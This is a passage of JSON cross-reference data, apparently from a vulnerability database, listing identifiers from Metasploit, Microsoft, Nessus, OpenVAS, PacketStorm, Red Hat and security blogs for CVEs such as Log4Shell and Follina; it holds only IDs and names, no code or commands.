"MSF:EXPLOIT-WINDOWS-FILEFORMAT-OFFICE_WORD_HTA-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-WORD_MSDTJS_RCE-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-WORD_MSHTML_RCE-"]}, {"type": "mmpc", "idList": ["MMPC:1E3441B57C08BC18202B9FE758C2CA71", "MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:42ECD98DCF925DC4063DE66F75FB5433", "MMPC:567C6CC66BD942B4F1BBE84ED9F6665B", "MMPC:795E0A765679492C51FEFA2B19EAD597", "MMPC:85647D37E79AFEF2BFF74B4682648C5E", "MMPC:BB2F5840056D55375C4A19D2FF07C695", "MMPC:C857BFAD4920FD5B25BF42D5469945F6", "MMPC:F36351D1B5A5C40989F46EF8729039A7"]}, {"type": "mozilla", "idList": ["MFSA2022-33", "MFSA2022-34", "MFSA2022-35", "MFSA2022-36", "MFSA2022-37"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0199", "MS:CVE-2017-11882", "MS:CVE-2018-0802", "MS:CVE-2021-40444", "MS:CVE-2021-44228", "MS:CVE-2022-22022", "MS:CVE-2022-22026", "MS:CVE-2022-22028", "MS:CVE-2022-22029", "MS:CVE-2022-22034", "MS:CVE-2022-22038", "MS:CVE-2022-22039", "MS:CVE-2022-22041", "MS:CVE-2022-22047", "MS:CVE-2022-22049", "MS:CVE-2022-2294", "MS:CVE-2022-2295", "MS:CVE-2022-2624", "MS:CVE-2022-30190", "MS:CVE-2022-30206", "MS:CVE-2022-30220", "MS:CVE-2022-30226", "MS:CVE-2022-3075", "MS:CVE-2022-33636", "MS:CVE-2022-33649", "MS:CVE-2022-34713", "MS:CVE-2022-34715", "MS:CVE-2022-34718", "MS:CVE-2022-34724", "MS:CVE-2022-35743", "MS:CVE-2022-35750", "MS:CVE-2022-35796", "MS:CVE-2022-35803", "MS:CVE-2022-37969", "MS:CVE-2022-38012", "MS:CVE-2022-41040", "MS:CVE-2022-41082"]}, {"type": "mskb", "idList": ["KB2553204", "KB3141529", "KB3141538", "KB3162047", "KB3178703", "KB3178710", "KB4011262", "KB4011276", "KB4011574", "KB4011580", "KB4011604", "KB4011607", "KB4011610", "KB4011618", "KB4011643", "KB4011656", "KB4011659", "KB4014793", "KB5005563", "KB5015863", "KB5015874", "KB5015875", "KB5015877", "KB5017305", "KB5017308", "KB5017316", "KB5017327", "KB5017328", "KB5017358", "KB5017371", "KB5017392", "KB5019758"]}, {"type": "msrc", "idList": ["MSRC:4C56F4539ADD1B17DFD44549ADFEE2FF", "MSRC:4F7507AA26F4DEB78152DE764136012C", "MSRC:543F3A129A47F4B14FB170389908717B"]}, {"type": "mssecure", "idList": ["MSSECURE:1E3441B57C08BC18202B9FE758C2CA71", "MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:567C6CC66BD942B4F1BBE84ED9F6665B", "MSSECURE:795E0A765679492C51FEFA2B19EAD597", "MSSECURE:7D81C7477636B6DB964C5D3E62D605D5", "MSSECURE:85647D37E79AFEF2BFF74B4682648C5E", "MSSECURE:A133B2DDF50F8BE904591C1BB592991A", "MSSECURE:BB2F5840056D55375C4A19D2FF07C695", "MSSECURE:C3D318931D83D536C01D2307EBC0B3B0", "MSSECURE:C857BFAD4920FD5B25BF42D5469945F6", "MSSECURE:DF21D5BD34E334683F0DCC4F64FDC83E", "MSSECURE:F36351D1B5A5C40989F46EF8729039A7"]}, {"type": "myhack58", "idList": ["MYHACK58:62201785187", "MYHACK58:62201785189", "MYHACK58:62201785243", "MYHACK58:62201785268", "MYHACK58:62201785272", "MYHACK58:62201785331", "MYHACK58:62201786816", "MYHACK58:62201786827", "MYHACK58:62201788439", "MYHACK58:62201788542", "MYHACK58:62201789251", "MYHACK58:62201789425", "MYHACK58:62201891024", "MYHACK58:62201891962", "MYHACK58:62201892253", "MYHACK58:62201892510", "MYHACK58:62201994299", "MYHACK58:62201994516"]}, {"type": "nessus", "idList": ["701415.PASL", "701420.PASL", "AL2_ALAS-2021-001.NASL", "AL2_ALAS-2021-1730.NASL", "AL2_ALAS-2021-1731.NASL", "AL2_ALAS-2021-1732.NASL", "AL2_ALAS-2021-1733.NASL", "AL2_ALAS-2022-1773.NASL", "AL2_ALAS-2022-1806.NASL", "AL2_ALAS-2022-1855.NASL", "AL2_ALASCORRETTO8-2021-001.NASL", "AL2_ALASJAVA-OPENJDK11-2021-001.NASL", "ALA_ALAS-2021-1553.NASL", "ALA_ALAS-2021-1554.NASL", "ALA_ALAS-2022-1562.NASL", "ALA_ALAS-2022-1580.NASL", "ALA_ALAS-2022-1601.NASL", "ALMA_LINUX_ALSA-2022-0290.NASL", "ALMA_LINUX_ALSA-2022-6164.NASL", "ALMA_LINUX_ALSA-2022-6165.NASL", "ALMA_LINUX_ALSA-2022-6174.NASL", "ALMA_LINUX_ALSA-2022-6175.NASL", "APACHE_APEREO_CAS_LOG4SHELL.NBIN", "APACHE_DRUID_LOG4SHELL.NBIN", "APACHE_JSPWIKI_LOG4SHELL.NBIN", "APACHE_LOG4J_2_15_0.NASL", "APACHE_LOG4J_2_16_0.NASL", "APACHE_LOG4J_2_16_0_MAC.NASL", "APACHE_LOG4J_2_17_0.NASL", "APACHE_LOG4J_2_17_0_MAC.NASL", "APACHE_LOG4J_2_17_1.NASL", "APACHE_LOG4J_JDNI_LDAP_GENERIC.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_HTTP_HEADERS.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_TELNET.NBIN", "APACHE_LOG4J_JNDI_LDAP_GENERIC_RAW.NBIN", "APACHE_LOG4J_WIN_2_15_0.NASL", "APACHE_LOG4SHELL_CVE-2021-45056_DIRECT_CHECK.NBIN", "APACHE_LOG4SHELL_DNS.NBIN", "APACHE_LOG4SHELL_IMAP.NBIN", "APACHE_LOG4SHELL_MSRPC.NBIN", "APACHE_LOG4SHELL_NETBIOS.NBIN", "APACHE_LOG4SHELL_POP3.NBIN", "APACHE_LOG4SHELL_SMTP.NBIN", "APACHE_LOG4SHELL_SNMP.NBIN", "APACHE_LOG4SHELL_SSH.NBIN", "APACHE_LOG4SHELL_UPNP.NBIN", "APACHE_OFBIZ_LOG4SHELL.NBIN", "APACHE_SOLR_LOG4SHELL.NBIN", "APPLE_IOS_156_CHECK.NBIN", "CENTOS_RHSA-2022-6169.NASL", "CENTOS_RHSA-2022-6179.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-CUIC.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-ISE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-SDWAN-VMANAGE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-UCS-DIRECTOR.NASL", "DEBIAN_DLA-2842.NASL", "DEBIAN_DLA-2852.NASL", "DEBIAN_DLA-2870.NASL", "DEBIAN_DLA-2905.NASL", "DEBIAN_DLA-3080.NASL", "DEBIAN_DLA-3097.NASL", "DEBIAN_DSA-5020.NASL", "DEBIAN_DSA-5022.NASL", "DEBIAN_DSA-5024.NASL", "DEBIAN_DSA-5180.NASL", "DEBIAN_DSA-5201.NASL", "DEBIAN_DSA-5217.NASL", "DEBIAN_DSA-5221.NASL", "DEBIAN_DSA-5225.NASL", "EULEROS_SA-2022-1276.NASL", "EXCHANGE_CVE-2022-41040_IOC.NBIN", "FREEBSD_PKG_1EA05BB85D7411ECBB1E001517A2E1A4.NASL", "FREEBSD_PKG_3FADD7E4F8FB45A0A2188FD6423C338F.NASL", "FREEBSD_PKG_4B1AC5A35BD411EC8602589CFC007716.NASL", "FREEBSD_PKG_515DF85A5CD711ECA16D001517A2E1A4.NASL", "FREEBSD_PKG_650734B2766541709A0AEECED5E10A5E.NASL", "FREEBSD_PKG_744EC9D7FE0F11ECBCD23065EC8FD3EC.NASL", "FREEBSD_PKG_93A1C9A75BEF11ECA47A001517A2E1A4.NASL", "FREEBSD_PKG_96A41723133A11EDBE3B3065EC8FD3EC.NASL", "FREEBSD_PKG_B0F49CB9673611EC9EEA589CFC007716.NASL", "FREEBSD_PKG_D1BE3D73673711EC9EEA589CFC007716.NASL", "FREEBSD_PKG_F38D25AC2B7A11EDA1EF3065EC8FD3EC.NASL", "GENTOO_GLSA-202208-35.NASL", "GENTOO_GLSA-202208-37.NASL", "GENTOO_GLSA-202208-38.NASL", "GENTOO_GLSA-202208-39.NASL", "GENTOO_GLSA-202209-02.NASL", "GENTOO_GLSA-202209-23.NASL", "GOOGLE_CHROME_103_0_5060_114.NASL", "GOOGLE_CHROME_104_0_5112_79.NASL", "GOOGLE_CHROME_105_0_5195_102.NASL", "LOG4J_LOG4SHELL_FTP.NBIN", "LOG4J_LOG4SHELL_NTP.NBIN", "LOG4J_LOG4SHELL_PPTP.NBIN", "LOG4J_LOG4SHELL_RPCBIND.NBIN", "LOG4J_LOG4SHELL_SIP_INVITE.NBIN", "LOG4J_LOG4SHELL_SMB.NBIN", "LOG4J_LOG4SHELL_WWW.NBIN", "LOG4J_VULNERABLE_ECOSYSTEM_LAUNCHER.NASL", "MACOSX_GOOGLE_CHROME_103_0_5060_114.NASL", "MACOSX_GOOGLE_CHROME_104_0_5112_79.NASL", "MACOSX_GOOGLE_CHROME_105_0_5195_102.NASL", "MACOS_FIREFOX_102_2_ESR.NASL", "MACOS_FIREFOX_104_0.NASL", "MACOS_FIREFOX_91_13_ESR.NASL", "MACOS_HT213345.NASL", "MACOS_SPLUNK_824.NASL", "MACOS_THUNDERBIRD_102_2.NASL", "MACOS_THUNDERBIRD_91_13.NASL", "MICROSOFT_EDGE_CHROMIUM_103_0_1264_49.NASL", "MICROSOFT_EDGE_CHROMIUM_104_0_1293_47.NASL", "MICROSOFT_EDGE_CHROMIUM_105_0_1343_25.NASL", "MICROSOFT_EDGE_CHROMIUM_105_0_1343_27.NASL", "MOBILEIRON_LOG4SHELL.NBIN", "MOZILLA_FIREFOX_102_2_ESR.NASL", "MOZILLA_FIREFOX_104_0.NASL", "MOZILLA_FIREFOX_91_13_ESR.NASL", "MOZILLA_THUNDERBIRD_102_2.NASL", "MOZILLA_THUNDERBIRD_91_13.NASL", "MS17-010.NASL", "MSDT_RCE_CVE_2022-30190_REG_CHECK.NASL", "MYSQL_ENTERPRISE_MONITOR_8_0_30.NASL", "NUTANIX_NXSA-AOS-5_20_3_5.NASL", "NUTANIX_NXSA-AOS-5_20_4.NASL", "NUTANIX_NXSA-AOS-6_0_2_5.NASL", "NUTANIX_NXSA-AOS-6_0_2_6.NASL", "NUTANIX_NXSA-AOS-6_1.NASL", "NUTANIX_NXSA-AOS-6_1_1.NASL", "OPENSUSE-2021-1577.NASL", "OPENSUSE-2021-1586.NASL", "OPENSUSE-2021-1601.NASL", "OPENSUSE-2021-1605.NASL", "OPENSUSE-2021-1612.NASL", "OPENSUSE-2021-1613.NASL", "OPENSUSE-2021-1631.NASL", "OPENSUSE-2021-3999.NASL", "OPENSUSE-2021-4094.NASL", "OPENSUSE-2021-4107.NASL", "OPENSUSE-2021-4109.NASL", "OPENSUSE-2021-4111.NASL", "OPENSUSE-2021-4112.NASL", "OPENSUSE-2021-4118.NASL", "OPENSUSE-2021-4208.NASL", "OPENSUSE-2022-0002-1.NASL", "OPENSUSE-2022-0038-1.NASL", "OPENSUSE-2022-10055-1.NASL", "OPENSUSE-2022-10057-1.NASL", "OPENSUSE-2022-10086-1.NASL", "OPENSUSE-2022-10087-1.NASL", "OPENSUSE-2022-10088-1.NASL", "OPENSUSE-2022-10117-1.NASL", "OPENSUSE-2022-10118-1.NASL", "OPENSUSE-2022-10119-1.NASL", "OPENSUSE-2022-10120-1.NASL", "ORACLELINUX_ELSA-2021-5206.NASL", "ORACLELINUX_ELSA-2022-0290.NASL", "ORACLELINUX_ELSA-2022-6164.NASL", "ORACLELINUX_ELSA-2022-6165.NASL", "ORACLELINUX_ELSA-2022-6169.NASL", "ORACLELINUX_ELSA-2022-6174.NASL", "ORACLELINUX_ELSA-2022-6175.NASL", "ORACLELINUX_ELSA-2022-6179.NASL", "ORACLELINUX_ELSA-2022-9056.NASL", "ORACLE_ENTERPRISE_MANAGER_CPU_APR_2022.NASL", "ORACLE_ENTERPRISE_MANAGER_OPS_CENTER_CPU_APR_2022.NASL", "ORACLE_IDENTITY_MANAGEMENT_CPU_APR_2022.NASL", "ORACLE_JDEVELOPER_CPU_APR_2022.NASL", "ORACLE_PRIMAVERA_GATEWAY_CPU_JAN_2022.NASL", "ORACLE_PRIMAVERA_P6_EPPM_CPU_JAN_2022.NASL", "ORACLE_PRIMAVERA_UNIFIER_CPU_JAN_2022.NASL", "ORACLE_WEBCENTER_PORTAL_CPU_APR_2022.NASL", "ORACLE_WEBCENTER_PORTAL_CPU_JAN_2022.NASL", "ORACLE_WEBCENTER_SITES_CPU_APR_2022.NASL", "ORACLE_WEBLOGIC_SERVER_CPU_JAN_2022.NASL", "PALO_ALTO_LOG4SHELL.NASL", "REDHAT-RHSA-2022-1296.NASL", "REDHAT-RHSA-2022-1297.NASL", "REDHAT-RHSA-2022-1462.NASL", "REDHAT-RHSA-2022-1463.NASL", "REDHAT-RHSA-2022-6164.NASL", "REDHAT-RHSA-2022-6165.NASL", "REDHAT-RHSA-2022-6166.NASL", "REDHAT-RHSA-2022-6167.NASL", "REDHAT-RHSA-2022-6168.NASL", "REDHAT-RHSA-2022-6169.NASL", "REDHAT-RHSA-2022-6174.NASL", "REDHAT-RHSA-2022-6175.NASL", "REDHAT-RHSA-2022-6176.NASL", "REDHAT-RHSA-2022-6177.NASL", "REDHAT-RHSA-2022-6178.NASL", "REDHAT-RHSA-2022-6179.NASL", "SLACKWARE_SSA_2022-235-02.NASL", "SLACKWARE_SSA_2022-235-03.NASL", "SLACKWARE_SSA_2022-249-01.NASL", "SL_20220825_FIREFOX_ON_SL7_X.NASL", "SL_20220825_THUNDERBIRD_ON_SL7_X.NASL", "SMB_NT_MS17-010.NASL", "SMB_NT_MS17-APR_4015551.NASL", "SMB_NT_MS17_APR_4014793.NASL", "SMB_NT_MS17_APR_4015549.NASL", "SMB_NT_MS17_APR_OFFICE.NASL", "SMB_NT_MS17_NOV_OFFICE.NASL", "SMB_NT_MS18_JAN_OFFICE.NASL", "SMB_NT_MS18_JAN_OFFICE_COMPATIBILITY.NASL", "SMB_NT_MS21_IE_SEPT_2021.NASL", "SMB_NT_MS21_SEP_5005565.NASL", "SMB_NT_MS21_SEP_5005566.NASL", "SMB_NT_MS21_SEP_5005568.NASL", "SMB_NT_MS21_SEP_5005569.NASL", "SMB_NT_MS21_SEP_5005573.NASL", "SMB_NT_MS21_SEP_5005613.NASL", "SMB_NT_MS21_SEP_INTERNET_EXPLORER.NASL", "SMB_NT_MS22_AUG_5016616.NASL", "SMB_NT_MS22_AUG_5016622.NASL", "SMB_NT_MS22_AUG_5016623.NASL", "SMB_NT_MS22_AUG_5016627.NASL", "SMB_NT_MS22_AUG_5016629.NASL", "SMB_NT_MS22_AUG_5016639.NASL", "SMB_NT_MS22_AUG_5016679.NASL", "SMB_NT_MS22_AUG_5016683.NASL", "SMB_NT_MS22_AUG_5016684.NASL", "SMB_NT_MS22_AUG_5016686.NASL", "SMB_NT_MS22_JUL_5015807.NASL", "SMB_NT_MS22_JUL_5015808.NASL", "SMB_NT_MS22_JUL_5015811.NASL", "SMB_NT_MS22_JUL_5015814.NASL", "SMB_NT_MS22_JUL_5015827.NASL", "SMB_NT_MS22_JUL_5015832.NASL", "SMB_NT_MS22_JUL_5015862.NASL", "SMB_NT_MS22_JUL_5015870.NASL", "SMB_NT_MS22_JUL_5015875.NASL", "SMB_NT_MS22_JUL_5015877.NASL", "SMB_NT_MS22_JUN_5014678.NASL", "SMB_NT_MS22_JUN_5014692.NASL", "SMB_NT_MS22_JUN_5014697.NASL", "SMB_NT_MS22_JUN_5014699.NASL", "SMB_NT_MS22_JUN_5014702.NASL", "SMB_NT_MS22_JUN_5014710.NASL", "SMB_NT_MS22_JUN_5014741.NASL", "SMB_NT_MS22_JUN_5014742.NASL", "SMB_NT_MS22_JUN_5014743.NASL", "SMB_NT_MS22_JUN_5014746.NASL", "SMB_NT_MS22_NOV_EXCHANGE.NASL", "SMB_NT_MS22_OCT_EXCHANGE_ZERODAY.NASL", "SMB_NT_MS22_SEP_5017305.NASL", "SMB_NT_MS22_SEP_5017308.NASL", "SMB_NT_MS22_SEP_5017315.NASL", "SMB_NT_MS22_SEP_5017327.NASL", "SMB_NT_MS22_SEP_5017328.NASL", "SMB_NT_MS22_SEP_5017365.NASL", "SMB_NT_MS22_SEP_5017371.NASL", "SMB_NT_MS22_SEP_5017373.NASL", "SMB_NT_MS22_SEP_5017377.NASL", "SMB_NT_MS22_SEP_5017392.NASL", "SPLUNK_824.NASL", "SUSE_SU-2021-14866-1.NASL", "SUSE_SU-2021-4111-1.NASL", "SUSE_SU-2021-4112-1.NASL", "SUSE_SU-2021-4115-1.NASL", "SUSE_SU-2022-2984-1.NASL", "SUSE_SU-2022-3007-1.NASL", "SUSE_SU-2022-3030-1.NASL", "SUSE_SU-2022-3272-1.NASL", "SUSE_SU-2022-3273-1.NASL", "SUSE_SU-2022-3281-1.NASL", "SUSE_SU-2022-3396-1.NASL", "UBIQUITI_UNIFI_NETWORK_LOG4SHELL.NBIN", "UBUNTU_USN-5192-1.NASL", "UBUNTU_USN-5192-2.NASL", "UBUNTU_USN-5197-1.NASL", "UBUNTU_USN-5203-1.NASL", "UBUNTU_USN-5223-1.NASL", "UBUNTU_USN-5568-1.NASL", "UBUNTU_USN-5581-1.NASL", "UBUNTU_USN-5663-1.NASL", "VMWARE_HORIZON_LOG4SHELL.NBIN", "VMWARE_VCENTER_LOG4SHELL.NBIN", "VMWARE_VREALIZE_OPERATIONS_MANAGER_LOG4SHELL.NBIN", "WEB_APPLICATION_SCANNING_113075"]}, {"type": "nvidia", "idList": ["NVIDIA:5294", "NVIDIA:5295"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810686", "OPENVAS:1361412562310810687", "OPENVAS:1361412562310810688", "OPENVAS:1361412562310810689", "OPENVAS:1361412562310810690", "OPENVAS:1361412562310810692", "OPENVAS:1361412562310810850", "OPENVAS:1361412562310810851", "OPENVAS:1361412562310812083", "OPENVAS:1361412562310812148", "OPENVAS:1361412562310812202", "OPENVAS:1361412562310812209", "OPENVAS:1361412562310812607", "OPENVAS:1361412562310812614", "OPENVAS:1361412562310812618", "OPENVAS:1361412562310812623", "OPENVAS:1361412562310812624", "OPENVAS:1361412562310812708", "OPENVAS:1361412562310812730", "OPENVAS:1361412562310812731"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2022", "ORACLE:CPUJAN2022", "ORACLE:CPUJUL2022", "ORACLE:CPUOCT2022"]}, {"type": "oraclelinux", "idList": ["ELSA-2022-6164", "ELSA-2022-6165", "ELSA-2022-6169", "ELSA-2022-6174", "ELSA-2022-6175", "ELSA-2022-6179"]}, {"type": "osv", "idList": ["OSV:DLA-2842-1", "OSV:DLA-2852-1", "OSV:DLA-2870-1", "OSV:DLA-3080-1", "OSV:DLA-3097-1", "OSV:DSA-5020-1", "OSV:DSA-5022-1", "OSV:DSA-5024-1", "OSV:DSA-5180-1", "OSV:DSA-5201-1", "OSV:DSA-5217-1", "OSV:DSA-5221-1", "OSV:DSA-5225-1", "OSV:GHSA-3QPM-H9CH-PX3C", "OSV:GHSA-7RJR-3Q55-VV33", "OSV:GHSA-8489-44MV-GGJ8", "OSV:GHSA-FP5R-V3W9-4333", "OSV:GHSA-J3CH-VJPH-8Q6V", "OSV:GHSA-J7C3-96RF-JRRP", "OSV:GHSA-JFH8-C2JP-5V3Q", "OSV:GHSA-MF4F-J588-5XM8", "OSV:GHSA-P6XC-XR62-6R2G", "OSV:GHSA-V57X-GXFJ-484Q"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142211", "PACKETSTORM:142281", "PACKETSTORM:143164", "PACKETSTORM:145226", "PACKETSTORM:165214", "PACKETSTORM:165261", "PACKETSTORM:165270", "PACKETSTORM:165532", "PACKETSTORM:165642", "PACKETSTORM:165673", "PACKETSTORM:167317", "PACKETSTORM:167438", "PACKETSTORM:167917", "PACKETSTORM:168068", "PACKETSTORM:168069"]}, {"type": "paloalto", "idList": ["PA-CVE-2021-44228"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:E6B48FF79C5D0D1E4DD360F6010F2A93"]}, {"type": "qt", "idList": ["QT:7EFAEDCED59EA2EE3AB98A0A484C5825"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:0EAB7251347951045CAC549194E33673", "QUALYSBLOG:13C1A00A7D0A7B1BB16D0AB5B1E9B51A", "QUALYSBLOG:15D6ABF4D9A50D86E63BA4553A0CD3C6", "QUALYSBLOG:33FD0B08A1B2E414EAA2ADDFCDFE0EB1", "QUALYSBLOG:3F1898282AF38991E0B849D7A68D2A2B", "QUALYSBLOG:3FADA4B80DBBF178154C0729CFC1358F", "QUALYSBLOG:42335884011D582222F08AEF81D70B94", "QUALYSBLOG:5059D1C3913FB6542F3283A66F9B3A43", "QUALYSBLOG:5576D16DC39617927D8AEFF027CC0911", "QUALYSBLOG:55DEB69D0C94AA59433F0E33F7B45AEC", "QUALYSBLOG:5A5DF56C2B4E5DB4176574A83F54FECB", "QUALYSBLOG:65C282BB0F312A3AD8A043024FD3D866", "QUALYSBLOG:68BBBF644900DA0A883AABB0E4E3F28B", "QUALYSBLOG:69FF0F583C65CD2D1EB59914BE41A705", "QUALYSBLOG:6C71B912ABF74BE51F014EC90669CF30", "QUALYSBLOG:89B0E9C4C12FFA944639C5B7B34594DB", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:9404839CD3C8BAC4F52CB2E5E91BC85E", "QUALYSBLOG:97274435F9F49556ED060635FD9081E2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:9E3CACCA2916D132C2D630A8C15119F3", "QUALYSBLOG:A0F20902D80081B44813D92C6DCCDAAF", "QUALYSBLOG:A63B251EBA1A69DBCD57674990704F6C", "QUALYSBLOG:AC756D2C7DB65BB8BC9FBD558B7F3AD3", "QUALYSBLOG:AE4AA7402829D66599C8A25E83DD0FD2", "QUALYSBLOG:BB3D6B2DDD8D4FA41B52503EF011FDA4", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:C2ECE416E32C6CC230B13471D41A4E03", "QUALYSBLOG:C3C14B989683A02C2C9A98CE918FBC3C", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:D38E3F9D341C222CBFEA0B99AD50C439", "QUALYSBLOG:DE2E40D3BB574E53C7448F3A304849C9", "QUALYSBLOG:F062F85432853297A014064EA7A5C183", "QUALYSBLOG:FFC962F3C57B514805A24EA07FF565A1"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:02EDDA927928C11A6D10A4A0D17823AF", "RAPID7BLOG:0576BE6110654A3F9BF7B9DE1118A10A", "RAPID7BLOG:078D5EE222682A75AE1A1A3A3684E38D", "RAPID7BLOG:0C5C51ED53983B92C7C9805E820366C9", "RAPID7BLOG:18CF89AA3B9772E6A572177134F45F3A", "RAPID7BLOG:18D49792276E208F17E7D64BCE2FDEF6", "RAPID7BLOG:1D39E7BBA13704DCBB8153C89ABE6B72", "RAPID7BLOG:207700353EDB2453B1928E90A6683A0E", "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:2FC92FBE5A4445611C80C7C3FA7D9354", "RAPID7BLOG:2FFDE45F01FA44216BE91DD7AFA0D060", "RAPID7BLOG:36C78C12B88BFE8FEF93D8EF7A7AA553", "RAPID7BLOG:45B045D2EE21432DF9939E4402522BFC", "RAPID7BLOG:4CDB288231FA4BF52C0067D9D4FEABBF", "RAPID7BLOG:509F3BE1FB927288AB4D3BD9A3090852", "RAPID7BLOG:5DB8D1BDA8397518E9A820552610B197", "RAPID7BLOG:602109CBDD808C41E4DDC9FBC55E144D", "RAPID7BLOG:6EADCD983283E3D546EF2907978E95F1", "RAPID7BLOG:7767347A5784FF1C4901601A1A21D2C8", "RAPID7BLOG:7F1312E79E0925118565C90443170051", "RAPID7BLOG:882168BD332366CE296FB09DC00E018E", "RAPID7BLOG:90A5B4252807D9A3550CB8449AA62109", "RAPID7BLOG:97E3CA7ED938F3DF6E967C832F314FA3", "RAPID7BLOG:9CB105938BDE92F573A2DE68BC20CF46", "RAPID7BLOG:9F3C0081D4135E83F44053063F0E78EE", "RAPID7BLOG:AB5C0BC130F45073226CC41D25680EA0", "RAPID7BLOG:ADAE3CACA7F41A02C12F44F4616369FF", "RAPID7BLOG:AE824D3989C792700A622C455D8EE160", "RAPID7BLOG:AF9402873FB7ED43C52806FDEB7BC6DD", "RAPID7BLOG:AF9E6199C63A57B22FAE6AAEDD650D39", "RAPID7BLOG:B37CF2E44EB6AA38B417BB09297CD3E1", "RAPID7BLOG:B54637535A9D368B19D4D9881C6C34B3", "RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44", "RAPID7BLOG:BE60EE9A1ACB3CEE4593041ECAFA8D95", "RAPID7BLOG:C6C1B8357ABD28AEB0F423A0A099098A", "RAPID7BLOG:CB62092B4C7E70876CF276BA04DD7597", "RAPID7BLOG:CC071AA6971D64B0F7A596B2BBD5F046", "RAPID7BLOG:D185BF677E20E357AFE422CFB80809A5", "RAPID7BLOG:D1E1A150733F5AFC2C704DB26E7EAB30", "RAPID7BLOG:E3D08ECAA9A93569D5544F4D6AAEEB74", "RAPID7BLOG:E43819A7DE1DD0F60E63E67A27B9301B", "RAPID7BLOG:ED80467D2D29D8DC10E754C9EA19D9AD", "RAPID7BLOG:F14526C6852230A4E4CF44ADE151DF49", "RAPID7BLOG:F14E17E573386DB3DDD27A8E829E49A1", "RAPID7BLOG:F37BD0C67170721734A26D15E6D99B3E", "RAPID7BLOG:F76EF7D6AB9EB07FC8B8BCE442DC3A69", "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630", "RAPID7BLOG:FB97B7B381BE98BE0077666DFDEC1953", "RAPID7BLOG:FBEE52CB3C438E4C42D6212E07BEFEA9"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:BDA3EA90B57FC8895B98DAADBAE3D7DE", "RAPID7COMMUNITY:DADF9A5B22CCB70155177EBC2E86131E"]}, {"type": "redhat", "idList": ["RHSA-2021:5093", "RHSA-2021:5094", "RHSA-2021:5106", "RHSA-2021:5107", "RHSA-2021:5108", "RHSA-2021:5126", "RHSA-2021:5127", "RHSA-2021:5128", "RHSA-2021:5129", "RHSA-2021:5130", "RHSA-2021:5132", "RHSA-2021:5133", "RHSA-2021:5134", "RHSA-2021:5137", "RHSA-2021:5138", "RHSA-2021:5140", "RHSA-2021:5141", "RHSA-2021:5148", "RHSA-2021:5183", "RHSA-2021:5184", "RHSA-2021:5186", "RHSA-2022:0026", "RHSA-2022:0042", "RHSA-2022:0043", "RHSA-2022:0044", "RHSA-2022:0047", "RHSA-2022:0082", "RHSA-2022:0083", "RHSA-2022:0138", "RHSA-2022:0181", "RHSA-2022:0203", "RHSA-2022:0205", "RHSA-2022:0216", "RHSA-2022:0219", "RHSA-2022:0222", "RHSA-2022:0223", "RHSA-2022:0225", "RHSA-2022:0226", "RHSA-2022:0227", "RHSA-2022:0230", "RHSA-2022:0236", "RHSA-2022:0296", "RHSA-2022:0431", "RHSA-2022:0467", "RHSA-2022:0485", "RHSA-2022:0493", "RHSA-2022:1296", "RHSA-2022:1297", "RHSA-2022:1299", "RHSA-2022:1462", "RHSA-2022:1463", "RHSA-2022:1469", "RHSA-2022:6164", "RHSA-2022:6165", "RHSA-2022:6166", "RHSA-2022:6167", "RHSA-2022:6168", "RHSA-2022:6169", "RHSA-2022:6174", "RHSA-2022:6175", "RHSA-2022:6176", "RHSA-2022:6177", "RHSA-2022:6178", "RHSA-2022:6179"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-4104", "RH:CVE-2021-4125", "RH:CVE-2021-44228", "RH:CVE-2021-44832", "RH:CVE-2021-45046", "RH:CVE-2021-45105", "RH:CVE-2022-38476", "RH:CVE-2022-38477", "RH:CVE-2022-38478"]}, {"type": "rocky", "idList": ["RLSA-2022:6164", "RLSA-2022:6175"]}, {"type": "saint", "idList": ["SAINT:3A3289A18B5C46A88581C9E8D4D0CF5A", "SAINT:5DC0FF1D23C8E8C36A1A8D72F1EB2B74", "SAINT:DB6048DE08200736030664D3F0E6C764"]}, {"type": "schneier", "idList": ["SCHNEIER:FECDA04283F9CFE2D14C1550420A1804"]}, {"type": "securelist", "idList": ["SECURELIST:03923D895F0F0B7EB3A51F48002D1416", "SECURELIST:0C40BC07DFF80D4B158D166D0DC2C870", "SECURELIST:0EC04669D1B4F9900C7ED36BB8AFB1A2", "SECURELIST:0ED76DA480D73D593C82769757DFD87A", "SECURELIST:11665FFD7075FB9D59316195101DE894", "SECURELIST:163368D119719D834280EA969EDB785D", "SECURELIST:1670EF82924C5F24DC777CBD3BA4AE5E", "SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "SECURELIST:2625ABE43A309D7E388C4F0EBCA62244", "SECURELIST:29152837444B2A7E5A9B9FCB107DAB36", "SECURELIST:2E379BD626ECA8E38B18EDCA6CD22F3C", "SECURELIST:322E7EEAE549CDB14513C2EDB141B8BA", "SECURELIST:375240F06A95008FE7F1C49E97EEC5AF", 